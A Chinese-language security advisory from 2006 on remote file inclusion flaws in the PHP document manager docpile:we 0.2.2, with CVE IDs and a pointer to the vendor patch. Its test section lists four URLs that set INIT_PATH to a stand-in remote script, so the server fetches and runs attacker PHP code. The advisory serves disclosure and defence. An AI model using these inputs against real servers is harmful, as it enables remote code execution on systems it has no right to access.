首页 -> 安全研究

安全研究

安全漏洞
docpile:we "INIT_PATH" 文件包含漏洞

发布日期:2006-08-09
更新日期:2006-08-09

受影响系统:
docpile-we.berlios docpile:we 0.2.2
描述:
CVE(CAN) ID: CVE-2006-4075,CVE-2006-4076

docpile:we是基于PHP的文档管理系统。

Wim Fleischhauer docpile: wim's edition (docpile:we) 0.2.2存在多个PHP远程文件包含漏洞,远程攻击者通过 lib/access.inc.php、lib/folders.inc.php、lib/init.inc.php、lib/templates.inc.php内INIT_PATH参数中的URL,利用这些漏洞执行任意PHP代码。

<*来源:XORON (x0r0n@hotmail.com
  
  链接:http://secunia.com/advisories/21412
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.site.com/[path]/lib/folder.class.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/email.inc.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/document.class.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/auth.inc.php?INIT_PATH=http://evil_script?
-

建议:
厂商补丁:

docpile-we.berlios
------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://docpile-we.berlios.de

浏览次数:1802
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障